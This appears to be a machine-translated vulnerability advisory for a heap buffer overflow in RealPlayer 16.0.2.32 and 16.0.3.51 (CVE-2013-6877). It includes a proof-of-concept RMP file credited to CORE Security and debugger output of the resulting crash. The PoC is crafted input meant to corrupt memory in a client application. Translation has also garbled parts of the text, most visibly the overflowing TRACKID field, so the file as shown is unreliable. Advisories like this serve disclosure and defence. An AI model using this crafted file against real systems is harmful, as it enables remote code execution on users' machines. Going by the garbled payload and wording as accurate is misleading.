RealPlayer 'rmp' File Processing Remote Heap Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Real Networks RealPlayer 16.0.3.51
Real Networks RealPlayer 16.0.2.32
Description:
--------------------------------------------------------------------------------
Bugtraq id: 64398
CVE (CAN) ID: CVE-2013-6877

RealPlayer is a tool used to listen to and watch real-time audio, video, and Flash on the Internet.

RealPlayer 16.0.2.32 and 16.0.3.51 have a security vulnerability when processing RMP files. Remote attackers can trick client users into opening specially crafted RMP files and exploit this vulnerability to execute arbitrary code.

<* Source: Ricardo Narvaja

Link: http://www.coresecurity.com/advisories/realplayer-heap-based-buffer-overflow-vulnerability
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

/-----
<! --
#
# Description: RealPlayer v16.0.3.51 Proof of Concept (poc. rmp)
# Author: Ricardo Narvaja (CORE Security Exploit Writers Team)
# Core id: CORE-2013-0903
# Cve id: CVE-2013-6877
#
# The contents of this software are copyright (c) 2013 CORE Security and
(C) 2013 CoreLabs,
# And are licensed under a Creative Commons Attribution Non-trusted cial
Share-Alike 3.0 (United States)
# License: <
Href = "http://creativecommons.org/licenses/by-nc-sa/3.0/us/";> http://creativecommons.org/licenses/by-nc-sa/3.0/us/ </a>
#
# This software is provided ''as IS ''AND ANY EXPRESS OR IMPLIED
# Warranties are disclaimed. in no event shall core sdi Inc. BE LIABLE
# For any direct, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE
# This software.
#
-->

<? Xml version = "1.0"?>
<PACKAGE>
<TITLE> resto </TITLE>
<ACTION> import, replace </ACTION>
<SERVER>
<LOCATION> % fid </LOCATION>
</SERVER>
<TARGET> resto </TARGET>
<TRACKLIST>
<LISTID> 1 </LISTID>
<TRACK>

<TRACKID> 1. When there are too many dynamic route entries without aaaaaaaa serial numbers, there are too many dynamic route entries without aaaaaaaa serial numbers, too many dynamic route entries, and TRACKID>
<TITLE> The French Experience </TITLE>
<ARTIST> BBC ages </ARTIST>
<ALBUM> </ALBUM>
<CHANNELS> 0 </CHANNELS>
<Duration> 80480 </DURATION>
<FORMAT> </FORMAT>
<GENRE> </GENRE>
<QUALITY> 29000 </QUALITY>
<SIZE> 0 </SIZE>
<FILENAME> http: // aaaaaaaaaaaaaaaaaa </FILENAME>
</TRACK>
</TRACKLIST>
</PACKAGE>
-----/

Below is shown the result of opening the maliciously crafted file
'Poc. rmp' on Windows XP SP3:

/-----
63A530B6 8B08 mov ecx, dword ptr ds: [EAX]
63A530B8 8B51 04 mov edx, dword ptr ds: [ECX + 4] <---- crash in
Rpcontrols. dll
63A530BB 50 PUSH EAX
63A530BC FFD2 CALL EDX

EAX 01122BB8 ASCII
"Zookeeper
ECX 61616161
EDX 0267F278
EBX 00000000
ESP 0012F5CC
EBP 0012F5D0
ESI 0012F5F4
EDI 00DD8AD8
EIP 63A530B8 rpcontro.63A530B8
-----/

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Real Networks
-------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://service.real.com/realplayer/security/